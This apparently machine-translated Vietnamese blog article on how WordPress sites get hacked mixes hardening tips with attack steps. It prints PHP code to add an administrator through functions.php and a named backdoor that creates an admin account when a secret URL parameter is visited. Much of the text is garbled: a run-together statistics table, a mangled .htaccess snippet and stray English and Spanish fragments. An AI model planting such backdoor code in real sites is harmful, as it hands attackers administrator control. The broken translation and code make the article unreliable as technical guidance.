Cách hack mật khẩu quản trị wordpress

WordPress là hệ thống quản lý nội dung được sử dụng rộng rãi nhất trên thế giới. Hơn 63% trang web đã được tạo bằng CMS này và điều này khiến nó trở thành mục tiêu ưa thích của tin tặc. Thực tế khiến wordpress dễ bị hack nhất là nó sử dụng một số lượng lớn plugin có nguồn mở. Các plugin này có thể chứa một số mã và tập lệnh độc hại cung cấp cho tin tặc nền tảng để đưa phần mềm độc hại vào wordpress và thực hiện các hoạt động bất chính. Hơn nữa, google dork WordPress mới cũng được tin tặc sử dụng để tìm thông tin & trang web nhạy cảm dễ bị tấn công và dễ bị hack

Số liệu thống kê, cho thấy rằng gần như cứ sáu trang web do WordPress cung cấp thì có một trang dễ bị tấn công. Hơn nửa triệu trang web WordPress đã bị kẻ tấn công xâm nhập vào năm 2021. Các nhà cung cấp dịch vụ lưu trữ web phổ biến là mục tiêu nổi bật nhất của tin tặc

Tính đến năm 2021, 40% tất cả các báo cáo tấn công trang web WordPress chỉ đến từ năm máy chủ lưu trữ web, mặc dù 60% máy chủ lưu trữ web là doanh nghiệp vừa và nhỏ. Trong năm 2022, xu hướng này sẽ tiếp tục gia tăng với những phát hiện mới về các khai thác mới như lỗ hổng log4j

WordPress là một công nghệ lớn vì nó được ít nhất 28.183.568 trang web trực tiếp sử dụng trong năm 202- nguồn. xây dựng với

⭐Các trang web Wordpress được tính theo ngành

Công nghiệpĐếm Internet và Viễn thông97,19120 %Công nghệ62,59813 %Thực phẩm và đồ uống60,05412 %Nghệ thuật và giải trí41,6908 %Thể thao37,2598 %Sách và văn học25,3895 %Giáo dục và nghề nghiệp20,8304 %Nhà và vườn20,0954 %Động vật14,7133 %Sở thích và

Chắc hẳn bạn đang thắc mắc làm thế nào hacker có thể hack đăng nhập trang web wordpress. Trong bài đăng này, bạn sẽ biết thêm về cách WordPress bị tấn công, lý do dẫn đến việc trang web bị tấn công, các kỹ thuật tấn công khác nhau được sử dụng để tấn công trang web WordPress và các mẹo để ngăn chặn mối đe dọa bảo mật vào năm 2022

LƯU Ý . Mục đích của bài viết này chỉ là cung cấp cho bạn thông tin cơ bản về Cách đột nhập vào trang web WordPress hoặc bỏ qua đăng nhập. Hướng dẫn này chỉ dành cho mục đích giáo dục. Các kỹ thuật hack WordPress đã đề cập không được sử dụng để khai thác

Tính bảo mật của trang web WordPress của bạn sẽ được đặt câu hỏi khi nó bị tấn công mà bạn không biết. Việc hack trang web có thể kéo dài hàng tháng hoặc hàng năm nếu bạn không cập nhật chủ đề, plugin và CMS của mình

Chứa một số lỗ hổng cơ bản trong plugin, một trang web WordPress không được bảo mật là cánh cửa mở cho tin tặc muốn khôi phục dữ liệu của bạn hoặc đơn giản là làm hỏng trang web của bạn. Nó có thể dẫn đến việc trang web wordpress của bạn bị tin tặc tấn công

Điều quan trọng là phải cài đặt các plugin bảo mật wordpress ngay từ khi bắt đầu tạo trang web của bạn để không phải chống lại sự xâm nhập suốt cả năm

Đó là lý do tại sao trong hướng dẫn này, chúng tôi sẽ cung cấp cho bạn tất cả các kỹ thuật hack & lỗ hổng bảo mật khiến trang web WordPress của bạn dễ bị hack và các phương pháp hay nhất để đảm bảo tính bảo mật cho WordPress của bạn

Dưới đây là những rủi ro mà doanh nghiệp của bạn gặp phải trong trường hợp này

Mặc dù, wordpress dễ bị hack nhất nhưng điều này không có nghĩa là các CMS khác an toàn. Chúng cũng có thể bị hack. Để biết thông tin chuyên sâu, hãy truy cập  – Drupal đã hack. Magento bị hack. Prestashop bị tấn công. Shopify bị hack

Những tin tặc này là ai?

Các mối đe dọa chống lại trang web của bạn có thể đến từ ba nguồn khác nhau

Đầu tiên là các rô-bốt (bot). Chúng được khởi chạy từ máy tính và sẽ nhắm mục tiêu vào nhiều trang web để gây hại. Nhanh chóng, hiệu quả, họ khai thác các lỗi và lỗ hổng bảo mật trong các ứng dụng, plugin và chủ đề nhiều nhất có thể

Các lỗ hổng cho đến nay vẫn chưa được các nhà phát triển biết đến và sẽ phải được sửa chữa thông qua các bản cập nhật và bản vá. Các cuộc tấn công của bot đặc biệt hung hăng và do đó dễ dàng phát hiện được

Botnet, tương tự như bot, nhưng được khởi chạy từ mạng máy tính do phần mềm độc hại kiểm soát. Còn được gọi là đội quân zombie, lực sát thương của chúng rất đáng kể vì chúng có thể gây sát thương cho nhiều địa điểm cùng một lúc

Cuối cùng, nguy hiểm nhất trong tất cả, cuộc tấn công của con người. Một người tự nhiên đằng sau màn hình của họ tấn công trang web của bạn và tìm kiếm các yếu tố dễ bị tấn công. Kiểu tấn công này rất khó phát hiện vì con người kín đáo hơn bot hoặc botnet

Mặc dù một người đàn ông chỉ có thể tấn công một trang web tại một thời điểm, cuộc tấn công của anh ta không kém phần nguy hiểm. Sau đó, tin tặc có xu hướng nhắm mục tiêu vào các trang web có quy mô lớn lưu trữ dữ liệu quan trọng mà sau khi bị đánh cắp có thể dễ dàng bán lại với giá cao

⭐Dấu hiệu Trang web WordPress của bạn bị tấn công

Các dấu hiệu khác của trang wordpress bị tấn công bao gồm nhiều loại thông báo/cảnh báo được hiển thị bởi google. Nên để mắt đến những cảnh báo này

• Thông báo cảnh báo trước trang web lừa đảo
• Quảng cáo Google bị từ chối do phần mềm độc hại
• Thông báo Trang web này có thể bị tấn công trên Google

⭐Những lý do hàng đầu để hack một trang web WordPress

Trước hết, nó không chỉ là WordPress. Tất cả các trang web trên Internet đều dễ bị tấn công

Lý do tại sao các trang web WordPress là mục tiêu phổ biến của tin tặc vì đây là công cụ xây dựng trang web phổ biến nhất thế giới. Ngoài ra, điều này thể hiện rõ qua thực tế là lượng tìm kiếm của cụm từ này “ cách hack trang web wordpress 2022 ” . Hầu hết những người dùng này là những tin tặc có đạo đức và những người mới muốn học cách hack một trang web.

Sự phổ biến to lớn này cung cấp cho tin tặc một cách dễ dàng để tìm các trang web kém an toàn hơn để khai thác chúng

Tin tặc có những động cơ khác nhau, một số chỉ là những người mới bắt đầu học cách vận hành các trang web kém an toàn hơn

Tin tặc nói chung là những người độc hại phân phối phần mềm độc hại, chiếm đoạt tài nguyên lưu trữ của trang web để tấn công người khác hoặc thậm chí gửi thư rác qua Internet

Khi tin tặc có thể bỏ qua đăng nhập vào trang wordpress của bạn, anh ta có thể thực hiện nhiều loại hoạt động độc hại khác nhau như

• đánh cắp dữ liệu tài chính từ trang web thương mại điện tử được xây dựng trong thương mại điện tử [đọc – thương mại điện tử bị hack],
• phá hoại các trang web wordpress để giải trí hoặc tống tiền [ đọc – Phần mềm độc hại CoinHive khai thác tiền điện tử ]
• chèn các cửa hậu để đưa các sản phẩm dược phẩm bất hợp pháp vào trang web wordpress (đọc – wordpress pharma hack , Favicon. Cửa sau vi rút ico,
• gửi email spam (đọc – tấn công lừa đảo wordpress),
• lây nhiễm trang web bằng phần mềm độc hại – thông qua các tập lệnh độc hại tạo điều kiện tải xuống phần mềm độc hại/phần mềm có khả năng gây hại trên máy tính của người dùng
• sử dụng các kỹ thuật SEO mũ đen như injection Spam Links, SEO Spam, Japanese keyword hack (thêm các trang spam với từ khóa tiếng Nhật để tăng thứ hạng seo trên google. )

⚡️ Những Lý Do Hàng Đầu Dẫn Đến WordPress Bị Hack

Như đã nói, chúng ta hãy xem một số lý do hàng đầu khiến các trang web WordPress bị tấn công và cách ngăn trang web của bạn bị tấn công

Lý do 1. Lưu trữ web không an toàn

Giống như tất cả các trang web, các trang web WordPress được lưu trữ trên một máy chủ web. Một số công ty lưu trữ bỏ bê tính bảo mật của nền tảng lưu trữ của họ. Điều này đặc biệt thường xảy ra đối với các máy chủ miễn phí, không giới hạn hoặc chi phí thấp

Điều này có thể dễ dàng tránh được bằng cách chọn nhà cung cấp dịch vụ lưu trữ wordpress tốt nhất cho trang web của bạn

Madagascar Internet đảm bảo rằng trang web của bạn được lưu trữ trên một nền tảng an toàn với các máy chủ được định cấu hình phù hợp có thể chặn hầu hết các cuộc tấn công phổ biến nhất trên các trang web WordPress. Cũng nên đọc – Trang web được lưu trữ trên Godaddy bị tấn công  –  Trang web Godaddy bị treo – Tài khoản Siteground Trang web WordPress bị treo

Lý do 2. mật khẩu yếu

Mật khẩu là chìa khóa cho trang web WordPress của bạn. Bạn cần đảm bảo rằng bạn đang sử dụng một mật khẩu mạnh duy nhất cho từng tài khoản sau vì tất cả các tài khoản này đều có thể cung cấp cho tin tặc toàn quyền truy cập vào trang web của bạn

• Tài khoản quản trị viên WordPress của bạn
• Tài khoản bảng điều khiển lưu trữ web CPanel
• tài khoản FTP
• Cơ sở dữ liệu MySQL được sử dụng cho trang web WordPress của bạn
• Tài khoản email được sử dụng cho quản trị viên WordPress hoặc tài khoản lưu trữ

Tất cả các tài khoản này đều được bảo vệ bằng mật khẩu. Sử dụng mật khẩu yếu giúp tin tặc bẻ khóa mật khẩu dễ dàng hơn bằng các công cụ hack cơ bản

Bạn có thể dễ dàng tránh điều này bằng cách sử dụng mật khẩu mạnh và duy nhất cho mỗi tài khoản

Lý do 3. Quyền truy cập không được bảo vệ vào Quản trị viên WordPress (Thư mục wp-admin)

Khu vực quản trị WordPress cho phép người dùng truy cập các hành động khác nhau trên trang web WordPress của bạn. Nó cũng là khu vực bị tấn công nhiều nhất của một trang web WordPress

Để nó không được bảo vệ cho phép tin tặc thử các cách tiếp cận khác nhau để bẻ khóa trang web của bạn. Bạn có thể gây khó khăn cho họ bằng cách thêm các lớp xác thực vào thư mục quản trị WordPress của bạn

Trước hết, bạn cần bảo vệ khu vực quản trị WordPress của mình bằng mật khẩu. Điều này thêm một lớp bảo mật bổ sung và bất kỳ ai cố gắng truy cập quản trị viên WordPress sẽ cần cung cấp một mật khẩu bổ sung

Nếu bạn đang chạy một trang web WordPress nhiều tác giả hoặc nhiều người dùng, bạn có thể áp dụng mật khẩu mạnh cho tất cả người dùng trên trang web của mình

Bạn cũng có thể thêm xác thực hai yếu tố để khiến tin tặc khó truy cập vào khu vực quản trị WordPress của bạn hơn nữa

Lý do 4. Quyền truy cập tệp không chính xác

Quyền truy cập tệp là một bộ quy tắc được sử dụng bởi máy chủ web của bạn. Các quyền này giúp máy chủ web của bạn kiểm soát quyền truy cập vào các tệp trên trang web của bạn. Quyền đối với tệp/thư mục không chính xác có thể khiến kẻ tấn công ghi và sửa đổi quyền truy cập vào các tệp này

Tất cả các tệp WordPress của bạn phải có giá trị 644 làm quyền cho tệp. Tất cả các thư mục trên trang web WordPress của bạn phải có quyền 755 dưới dạng tệp

Lý do 5. Không cập nhật WordPress

Một số người dùng WordPress ngại cập nhật các trang web WordPress của họ, sợ rằng nó sẽ làm giảm chức năng của trang web của họ. Mỗi phiên bản mới của WordPress đều sửa lỗi và lỗ hổng bảo mật

Nếu bạn không cập nhật WordPress, bạn đang cố tình để trang web của mình dễ bị tấn công

Nếu bạn lo ngại rằng bản cập nhật sẽ làm hỏng trang web của mình, bạn có thể tạo bản sao lưu WordPress đầy đủ trước khi bắt đầu cập nhật

Bằng cách đó, nếu một cái gì đó không hoạt động, bạn có thể dễ dàng quay lại phiên bản trước

Chúng tôi có các nhà phát triển có kinh nghiệm để hỗ trợ bạn. Kiểm tra hướng dẫn của chúng tôi về cập nhật tự động wordpress

Lý do 6. Plugin hoặc chủ đề chưa được vá

Cũng giống như phần mềm WordPress chính, plugin và bảo mật chủ đề wordpress cũng rất quan trọng. Sử dụng plugin hoặc chủ đề lỗi thời có thể khiến trang web của bạn dễ bị tấn công. Bạn có thể tìm thấy các chủ đề đa năng wordpress an toàn mới nhất tại đây

Các lỗi và lỗi bảo mật thường được phát hiện trong các plugin và chủ đề WordPress. Thông thường, các tác giả chủ đề và plugin sửa chúng nhanh chóng. Tuy nhiên, nếu người dùng không cập nhật chủ đề hoặc plugin của họ, thì họ không thể làm gì được

Đảm bảo luôn cập nhật chủ đề và plugin WordPress của bạn và đảm bảo quét các chủ đề wordpress của bạn trước khi thực hiện cài đặt mới chủ đề WP không có giá trị

Các plugin WP dễ bị lỗ hổng. Điều rất quan trọng là bạn luôn cập nhật cho mình. Kiểm tra các bài đăng này để tìm hiểu lý do tại sao bạn phải luôn cập nhật các plugin của mình và thỉnh thoảng vá chúng

• Khai thác lỗ hổng nghiêm trọng trong Plugin WordPress Contact Form 7
• Lỗ hổng SQL Injection trong Plugin WordPress Ninja Forms đã được vá
• Khai thác lỗ hổng Zero Day Plugin Rich Reviews
• Lỗ hổng trong plugin convert Plus WordPress

Lý do 7. Sử dụng FTP thay vì SFTP/SSH

Tài khoản FTP được sử dụng để tải tệp lên máy chủ web của bạn bằng ứng dụng khách FTP. Hầu hết các máy chủ web đều hỗ trợ kết nối FTP bằng các giao thức khác nhau. Bạn có thể kết nối qua FTP, SFTP hoặc SSH đơn giản

Khi bạn kết nối với trang web của mình bằng FTP đơn giản, mật khẩu của bạn sẽ được gửi đến máy chủ mà không cần mã hóa. Nó có thể bị theo dõi và dễ dàng bị đánh cắp. Thay vì sử dụng FTP, bạn nên luôn sử dụng SFTP hoặc SSH

Bạn sẽ không cần thay đổi ứng dụng khách FTP của mình. Hầu hết các máy khách FTP có thể kết nối với trang web của bạn thông qua cả SFTP và SSH. Bạn chỉ cần thay đổi giao thức thành “SFTP – SSH” khi kết nối với trang web của mình

Bạn cũng có thể sử dụng trình quản lý tệp có sẵn trong cPanel của mình. Nó là một công cụ mạnh mẽ và trực quan, có điểm đặc biệt là cung cấp chức năng nén/giải nén (Zip/unzip) trên máy chủ

Lý do 8. Sử dụng Admin làm tên người dùng WordPress

Không nên sử dụng “admin” làm tên người dùng WordPress. Nếu tên người dùng quản trị của bạn là admin, bạn nên đổi ngay thành tên người dùng khác

Lý do 9. Chủ đề và plugin lỗi thời

Nhiều trang web trên Internet phân phối plugin trả phí và chủ đề WordPress miễn phí. Đôi khi, bạn rất dễ bị cám dỗ sử dụng các plugin và chủ đề miễn phí này cho trang web của mình

Tải xuống các chủ đề và plugin WordPress từ các nguồn không đáng tin cậy là rất nguy hiểm. Chúng không chỉ có thể xâm phạm tính bảo mật của trang web của bạn mà còn có thể được sử dụng để đánh cắp thông tin nhạy cảm

Bạn phải luôn tải xuống các plugin và chủ đề WordPress từ các nguồn có uy tín, chẳng hạn như trang web của nhà phát triển plugin/chủ đề hoặc kho lưu trữ chính thức của WordPress

Nếu bạn không đủ khả năng chi trả hoặc không muốn mua plugin hoặc chủ đề cao cấp, luôn có các lựa chọn thay thế miễn phí cho các sản phẩm này. Các plugin miễn phí này có thể không hoạt động tốt như các plugin trả phí, nhưng chúng sẽ hoàn thành công việc và quan trọng hơn là giữ an toàn cho trang web của bạn

Lý do 10. wp-config. tệp php không an toàn – Có thể dẫn đến wp-config. hack php

WordPress wp-config. tệp cấu hình php chứa thông tin kết nối cơ sở dữ liệu WordPress của bạn. Nếu bị xâm phạm, nó sẽ tiết lộ thông tin có thể cung cấp cho tin tặc toàn quyền truy cập vào trang web của bạn. cấu hình wp. php là tệp bị tấn công nhiều nhất sau wp-content. php

Bạn có thể thêm một lớp bảo vệ bổ sung bằng cách từ chối quyền truy cập vào tệp wp-config bằng cách sử dụng. htaccess. Chỉ cần thêm mã nhỏ này vào của bạn. tập tin htaccess

1

2 lệnh cho phép, từ chối

3 từ chối tất cả

4

Lý do 11. Không thay đổi tiền tố bảng WordPress

Nhiều chuyên gia khuyên bạn nên thay đổi tiền tố bảng mặc định của WordPress. Theo mặc định, WordPress sử dụng wp_ làm tiền tố cho các bảng được tạo trong cơ sở dữ liệu của bạn. Bạn có một tùy chọn để thay đổi nó trong khi cài đặt

Nên sử dụng tiền tố phức tạp hơn một chút. Điều này sẽ khiến tin tặc khó đoán tên các bảng cơ sở dữ liệu của bạn hơn

⭐Cách hack một trang web WordPress – Nhiều cách khác nhau

Tùy thuộc vào mục tiêu của nó, một cuộc tấn công độc hại sẽ mở đường cho các khả năng khác nhau để tấn công trang web WordPress của bạn

Dưới đây là các cuộc tấn công và phương pháp thường xuyên nhất liên quan đến các trang web được tạo bởi WordPress

1- Tạo người dùng mới qua FTP

Khi HTTP nằm ngoài tầm với của tin tặc, chúng sẽ cố gắng truy cập máy chủ FTP và tạo quyền quản trị viên mới. Để tạo một tài khoản bên ngoài môi trường quản trị viên WordPress, tất cả những gì tin tặc cần là quyền truy cập FTP vào trang web

Là quản trị viên, anh ta sẽ có tất cả thông tin cần thiết để kết nối với máy chủ và do đó tạo tài khoản người dùng mới bằng cách tạo chức năng mới bằng chủ đề của bạn

2 – chức năng. php

Có hai cách để tiếp cận điều này, thứ nhất bằng cách chỉnh sửa các chức năng. php thông qua cPanel và thứ hai bằng cách sử dụng ứng dụng khách FTP để đạt được điều này. Sử dụng cPanel, tin tặc mở Trình quản lý tệp và tìm thư mục chủ đề đang hoạt động

Từ đó, nó sẽ chuyển đến thư mục public_html / wp content / themes và tìm chủ đề. Tất cả những gì còn lại là mở tệp của anh ấy và chỉnh sửa các chức năng. php

Mã phải được thêm vào trước thẻ đóng và hack được thực hiện. Cũng đừng quên thay đổi mật khẩu. Khi tài khoản mới được tạo, tin tặc sẽ xóa mã khỏi các chức năng. tập tin php

3 – Sử dụng Cpanel/MySQL

Sử dụng phương pháp này để thay đổi mật khẩu (hoặc tên người dùng nếu cần) của người dùng hiện tại hoặc để tạo tài khoản mới. Bạn sẽ cần quyền truy cập cPanel hoặc quyền truy cập MySQL trực tiếp vào cơ sở dữ liệu của trang web. Hãy bắt đầu bằng cách thay đổi mật khẩu của người dùng hiện có

Nếu bạn đang sử dụng cPanel, hãy đăng nhập (cPanel luôn có thể được truy cập thông qua liên kết https://yoursite.com:2083), tìm và mở phpMyAdmin. Danh sách cơ sở dữ liệu và bảng ở bên trái. Bạn đang tìm bảng kết thúc bằng _users. Có thể là wp_users, nhưng nếu bạn có nhiều hơn một trang web WordPress được cài đặt trên máy chủ, thì bạn phải tìm đúng trang web

Bảng bên phải sẽ có người dùng bạn muốn chỉnh sửa trong đó. Làm theo quy trình tương tự nếu bạn đang kết nối với MySQL thông qua một số ứng dụng khách bên ngoài như SQLyog. Khi bạn xác định vị trí bảng và bản ghi người dùng thực tế, đã đến lúc thay đổi mật khẩu

Như bạn có thể đã biết, mật khẩu được lưu trong trường user_pass, được băm bằng thuật toán MD5. Mở trình tạo MD5 trực tuyến nhập mật khẩu bạn muốn sử dụng và nhấp vào "Băm". Sao chép chuỗi đã tạo và thay thế mật khẩu ban đầu bằng chuỗi đó. Trong phpMyAdmin, bạn có thể chỉnh sửa trường bằng cách nhấp đúp vào trường đó. Quy trình này tương tự như các máy khách MySQL khác. Lưu các thay đổi và đăng nhập vào WordPress bằng mật khẩu mới của bạn

4 – Tạo tài khoản người dùng mới qua FTP

Tài khoản FTP thường được sử dụng bởi những người dùng muốn tạo một khu vực thông qua một thư mục trong trang web của họ để cho phép tải lên và tải xuống tệp cho một số người nhất định bằng tên người dùng và mật khẩu mà họ tự chỉ định

Tất cả các tệp được xuất bản trong khu vực này cũng có thể được xem từ internet bằng tên miền và thư mục được sử dụng

Để tạo Tài khoản FTP trên trang web của bạn, hãy truy cập bảng điều khiển của bạn trên biểu tượng “Tài khoản FTP”. Trong phần này, bạn có thể định cấu hình quyền truy cập vào một khu vực cụ thể trên trang web của mình để tải lên hoặc tải xuống các tệp

• Nhập dữ liệu được yêu cầu
• Người dùng hoặc Đăng nhập. Tên người dùng của tài khoản FTP mới
• Mật khẩu. Mật khẩu bạn muốn gán cho tài khoản này để truy cập qua FTP
• Danh mục. Thư mục trong trang web có thể được truy cập qua FTP, tự động giống như người dùng không có @ mydomain. com, nhưng nó có thể được thay đổi. Thư mục này sẽ được tạo tự động nếu nó chưa được tạo. Nếu trường này để trống, tài khoản FTP mới sẽ có thể truy cập tất cả các thư mục trong trang web. Điều này không được khuyến nghị, vì vậy chúng tôi khuyên bạn chỉ nên cho phép truy cập vào thư mục public_html, ví dụ: nếu bạn muốn cho phép nhà thiết kế web của mình truy cập vào trang web của bạn để tải lên các tệp và thư mục tương ứng với trang web của bạn mà không thể nhập bằng
• Hạn ngạch. Đây là dung lượng tính bằng Mb mà bạn muốn gán cho thư mục này, có thể không giới hạn dung lượng hoặc đặt giới hạn dung lượng để không chiếm hết tài nguyên trong hosting của bạn
• Bây giờ chỉ cần nhấn nút Tạo để tạo tài khoản FTP mới

Người dùng tài khoản FTP mới phải truy cập trang web qua FTP bằng chương trình và với dữ liệu sau

Address / Host Name / Address: yourdomain.com or ftp.yourdomain.com

User / User: [email protected]

Password: El password assigned to this FTP account

Hải cảng. 21

Với điều này, bạn sẽ chỉ nhập thư mục được chỉ định trong trang web của mình để tải lên và tải xuống các tệp

The new user will have read and write permissions both on the chosen directory and on all the subdirectories it contains.

For example, if you create the client user and give him access to the / home / user / public_html / client directory (http://www.yourdomain.com/client), that user can add, delete, edit, and so on. all files in / home / user / public_html / client (http://www.yourdomain.com/client), and any subdirectory contained in the client directory (for example, / home / user / public_html / client / images - > http://www.yourdomain.com/client/images).

Ghi chú. Trong thông tin được cung cấp, hãy thay đổi tên miền của bạn. com đến tên miền của riêng bạn

Tạo tài khoản người dùng mới trên WordPress rất dễ dàng. Là quản trị viên, bạn cần điều hướng đến trang quản trị Người dùng nơi bạn có thể tạo tài khoản mới cho bất kỳ vai trò người dùng nào. Điều đó có thể được thực hiện trong vài giây và người dùng mới được tạo có thể đăng nhập ngay lập tức bằng tên người dùng và mật khẩu đã cho

Tạo tài khoản người dùng mới qua FTP

• Mở ứng dụng khách FTP và kết nối với tài khoản của bạn
• Điều hướng đến nội dung wp/chủ đề
• Mở thư mục của chủ đề bạn đang sử dụng
• Tìm kiếm chức năng. php tập tin và chỉnh sửa nó
• Sao chép và dán chức năng sau

function admin_account(){

$user = 'Username';

$pass = 'Password';

$email = '[email protected]';

if ( !username_exists( $user )  && !email_exists( 

$email ) ) {

$user_id = wp_create_user( $user, $pass, $email );

$user = new WP_User( $user_id );

$user->set_role( 'administrator' );

} }

add_action('init','admin_account');

• Change username, password, and email to something unique

• Save changes

⚡️ Kỹ thuật/Lỗ hổng được sử dụng để hack WordPress

Man-in-the-Middle tấn công

Người dùng có thể tận dụng các cuộc tấn công trung gian chống lại những người dùng chung mạng LAN. Miễn là thông tin đăng nhập không được mã hóa bằng đường hầm VPN hoặc mã khác như HTTPS, thông tin đăng nhập sẽ có thể được nhìn thấy ở dạng văn bản thuần túy. Phần mềm chủ yếu cho phép người dùng sử dụng kiểu tấn công này có thể phá hủy các plugin, xác định các chủ đề dễ bị tấn công và liệt kê người dùng. Chúng tôi khuyên bạn nên sử dụng đăng nhập không cần mật khẩu wordpress để đảm bảo an toàn cho cơ chế đăng nhập của bạn

WordPress Brute force tấn công

Các bot sẽ thử nhiều cách kết hợp tên người dùng và mật khẩu của bạn. Phương pháp này là cách dễ nhất để tin tặc truy cập trang web của bạn. Các plugin giúp ngăn chặn các thế lực vũ phu. Yêu cầu xác thực hai yếu tố cũng làm giảm nguy cơ bị hack

Tấn công XSS trong WordPress

Chúng tiêm mã JavaScript độc hại vào các trang trong WordPress của bạn. Bằng cách này, họ có thể truy xuất cookie được lưu trong phiên của người dùng. Sau đó, họ có quyền mạo danh người dùng bằng cách tự nhận mình là như vậy. Cài đặt tường lửa giúp tránh được kiểu tấn công này và nhiều vấn đề cho khách hàng của bạn

• cũng đọc. WordPress XSS Attack – Khai thác & Bảo vệ

Tấn công lệnh SQL

Chúng nhằm mục đích làm giảm hiệu suất của một trang web, đánh cắp dữ liệu hoặc thậm chí xóa hoặc làm hỏng nó. Đơn đặt hàng được đưa vào các trường đầu vào của trang web của bạn (ví dụ: trang nhận dạng). Cần có tường lửa và kiểm tra vệ sinh tốt (để xóa vĩnh viễn dữ liệu nhạy cảm)

Dưới đây là hướng dẫn chi tiết về WordPress Sql Injection

Chèn cửa sau

Khi tin tặc thấy rằng cửa trước bị đóng, chúng sẽ cố gắng truy cập vào cửa sau. Nghe có vẻ như là một cách độc hại để sử dụng mã để truy cập và kiểm soát trang web, nhưng đôi khi ngay cả chủ sở hữu trang web cũng sử dụng kỹ thuật này để kiểm soát trang web của họ. Sẽ có trường hợp cửa trước không mở để tin tặc truy cập vào trang web WordPress của bạn, nhưng khi đó cửa sau có thể bị tấn công và tin tặc sẽ cố gắng truy cập trực tiếp

Điều này chủ yếu xảy ra khi có một đoạn mã ẩn đằng sau môi trường WordPress của bạn và tin tặc có thể truy cập trang WordPress bằng quyền quản trị viên. Thông tin này có thể bị xóa và các bản sao lưu có thể được khôi phục hàng nghìn lần, nhưng thường thì chủ sở hữu không biết gì về các mục nhập cửa hậu

Tạo backdoor trong wordpress

OK, nói đủ rồi;

1. chức năng mở. tập tin php
2. Sao chép/Dán mã sau

add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'how to hack wordpress') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>

1. Lưu thay đổi

Nếu bạn để nguyên mã này, tất cả những gì bạn phải làm để tạo quản trị viên mới trên trang web là truy cập http. //www. tên miền của bạn. com/?backdoor=cách hack wordpress

Khai thác tiền điện tử, khai thác tiền điện tử

Sự ra đời của tiền điện tử và cơn sốt Bitcoin đã tạo ra các mối đe dọa mới như cryptojacking, còn được gọi là phần mềm độc hại khai thác tiền điện tử. Tin tặc giới thiệu phần mềm làm hỏng hệ thống và tài nguyên của máy (PC, điện thoại thông minh, máy chủ, v.v. ), để khai thác tiền điện tử trong nền và tạo ra lợi nhuận theo cách ẩn

Ký tự tiếng Nhật trong trang web wordpress

Khi hack từ khóa tiếng Nhật, văn bản tiếng Nhật được tạo tự động bắt đầu xuất hiện trên trang web của bạn. Thư rác SEO Blackhat này chiếm đoạt kết quả tìm kiếm của Google bằng cách hiển thị các từ tiếng Nhật trong tiêu đề và mô tả của các trang bị nhiễm. Điều này xảy ra khi các trang web khác nhau được trình bày cho các công cụ tìm kiếm và khách truy cập bình thường. Cuộc tấn công này còn được gọi là ” Hack từ khóa tiếng Nhật “, “Spam tìm kiếm tiếng Nhật” hoặc “Spam ký hiệu tiếng Nhật”

Lừa đảo

Lừa đảo là một trong những thuật ngữ hack phổ biến nhất được sử dụng bởi các nhân viên an ninh. Đây là một kỹ thuật lừa người dùng tiết lộ thông tin nhạy cảm (như tên người dùng, mật khẩu hoặc dữ liệu thẻ tín dụng) cho các nguồn dường như vô hại

Kẻ lừa đảo cải trang thành một thực thể đáng tin cậy và liên hệ với các nạn nhân tiềm năng để yêu cầu họ tiết lộ thông tin. Thông tin này có thể được sử dụng cho mục đích xấu

Ví dụ: kẻ lừa đảo có thể giả làm ngân hàng và yêu cầu thông tin đăng nhập tài khoản ngân hàng của người dùng qua email. Nó cũng có thể lừa bạn nhấp vào một liên kết lừa đảo

Để biết cách tự bảo vệ mình, bạn phải hiểu tấn công lừa đảo là gì, có những loại nào và cách bạn có thể nhận ra nó cũng như cách loại bỏ lừa đảo khỏi trang web WordPress. Hãy tiếp tục đọc, chúng tôi giúp bạn tránh các vấn đề bảo mật phát sinh từ cuộc tấn công này

Phần mềm độc hại

Bạn nghe thấy các trang web bị nhiễm phần mềm độc hại tấn công hàng ngày, vì vậy hãy tìm hiểu kỹ hơn về thuật ngữ hack này

Phần mềm độc hại là phần mềm do tin tặc thiết kế để chiếm quyền điều khiển hệ thống máy tính hoặc lấy cắp thông tin nhạy cảm từ thiết bị. Chúng có nhiều tên khác nhau như vi-rút, phần mềm quảng cáo, phần mềm gián điệp, keylogger, v.v. Phần mềm độc hại có thể được chuyển đến hệ thống thông qua nhiều phương tiện khác nhau như USB, ổ cứng hoặc thư rác

Một phần mềm độc hại rất phổ biến ẩn nấp trong năm 2021 là phần mềm độc hại chuyển hướng & phần mềm độc hại WP-VCD chuyển hướng trang web của bạn đến trang web spam. Biết thêm về phần mềm độc hại chuyển hướng tại đây

Ví dụ: một phần mềm độc hại gần đây hoạt động bằng cách chuyển hướng các trang web WP dành cho máy tính để bàn và thiết bị di động Opencart và Magento đến các liên kết độc hại. Điều này về cơ bản dẫn đến mất khách hàng, uy tín và hơn hết là ảnh hưởng xấu đến thứ hạng của công cụ tìm kiếm

Kiểm tra các hướng dẫn đầy đủ này để khắc phục các trang web WordPress bị nhiễm phần mềm độc hại

• Danh sách kiểm tra loại bỏ phần mềm độc hại WordPress
• Quét mã độc hại trong chủ đề WordPress của bạn

Phần mềm tống tiền WordPress

Một trong những thuật ngữ hack được nghiên cứu nhiều nhất năm 2017. Ransomware là một dạng phần mềm độc hại chặn quyền truy cập của người dùng vào hệ thống của chính họ và cắt quyền truy cập vào tệp của họ. Thông báo đòi tiền chuộc được hiển thị cho biết số tiền và địa điểm thanh toán, thường được yêu cầu bằng bitcoin, để khôi phục tệp của bạn.  

Các cuộc tấn công này không chỉ ảnh hưởng đến các cá nhân mà còn ảnh hưởng đến các ngân hàng, bệnh viện và doanh nghiệp trực tuyến. Một ví dụ rất gần đây về loại tiền chuộc này là cuộc tấn công Petya gần đây đã gây bão cho các doanh nghiệp trên toàn thế giới.

Tập lệnh chéo trang hoặc tập lệnh chéo trang (XSS)

Tin tặc sử dụng phương pháp này khởi chạy các cuộc tấn công XSS bằng cách đưa nội dung vào một trang, làm hỏng trình duyệt của mục tiêu

Do đó, một tin tặc có thể sửa đổi trang web theo mong muốn của mình, đánh cắp thông tin trên cookie, cho phép anh ta chiếm quyền điều khiển các trang web theo ý muốn để khôi phục dữ liệu nhạy cảm hoặc tiêm mã độc mà sau đó sẽ được thực thi

Clickjacking

